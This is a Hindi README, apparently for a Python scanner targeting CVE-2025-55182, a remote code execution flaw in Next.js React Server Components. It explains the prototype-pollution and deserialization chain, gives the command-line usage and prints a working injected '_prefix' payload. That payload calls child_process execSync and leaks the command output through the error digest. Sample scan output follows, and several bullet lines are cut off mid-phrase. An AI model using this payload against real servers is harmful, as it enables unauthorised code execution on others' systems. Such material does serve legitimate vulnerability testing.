
CVE-2025-55182 के लिए सुरक्षा स्कैनर - React Server Components में गंभीर RCE भेद्यता
यह टूल जाँचता है कि कोई लक्ष्य CVE‑2025‑55182 के प्रति संवेदनशील है या नहीं, जो Next.js के अंदर RSC (React Server Components) मॉडल पेलोड के असुरक्षित संचालन के कारण होने वाला एक Remote Code Execution बग है।
इस भेद्यता में प्रोटोटाइप पॉल्यूशन → डिसीरियलाइज़ेशन दुरुपयोग → सर्वर-साइड जावास्क्रिप्ट निष्पादन की श्रृंखला है।
अस्वीकरण: इसका उपयोग केवल उन सिस्टम पर करें जिनके आप कानूनी मालिक हैं या जिनके लिए आपके पास स्पष्ट अनुमति है। अनधिकृत परीक्षण = अपराध, भाई।
Next.js आंतरिक रूप से multipart/form-data के माध्यम से भेजे गए विशेष “मॉडल” ऑब्जेक्ट को प्रोसेस करता है।
यदि कोई हमलावर जाली thenable जैसी दुर्भावनापूर्ण संरचना इंजेक्ट करता है, तो वे इन्हें दूषित कर सकते हैं:
__proto___response._prefixconstructor.constructorइससे सर्वर हमलावर-नियंत्रित जावास्क्रिप्ट का मूल्यांकन करता है, जिसके परिणामस्वरूप पूर्ण RCE होता है।
-u) या लक्ष्यों की सूची (-l) स्वीकार करता हैid) निकालता हैfoxvuln.txt में सहेजता हैpython3 main.py -u https://target.com
python3 main.py -l list.txt
पेलोड इंजेक्टेड _prefix के माध्यम से process.mainModule.require('child_process').execSync() का दुरुपयोग करता है:
"_prefix": "var res=process.mainModule.require('child_process').execSync('id',{'timeout':5000}).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${res}`});",
यह सर्वर को id निष्पादित करने और परिणाम को फेंके गए डाइजेस्ट के अंदर लीक करने के लिए मजबूर करता है (क्योंकि RSC त्रुटियाँ जानबूझकर एक संरचित “digest” फ़ील्ड लौटाती हैं)।
संवेदनशील लक्ष्य:
[+] Testing: https://victim.com
[VULN] user : uid=1000(www-data)
संवेदनशील नहीं:
[+] Testing: https://secure.com
[NOT VULN]
सभी पुष्टिकृत संवेदनशील URL इसमें सहेजे जाते हैं:
foxvuln.txt
प्रारूप:
https://victim.com => uid=1000(www-data)
/ पर प्रोसेस करता है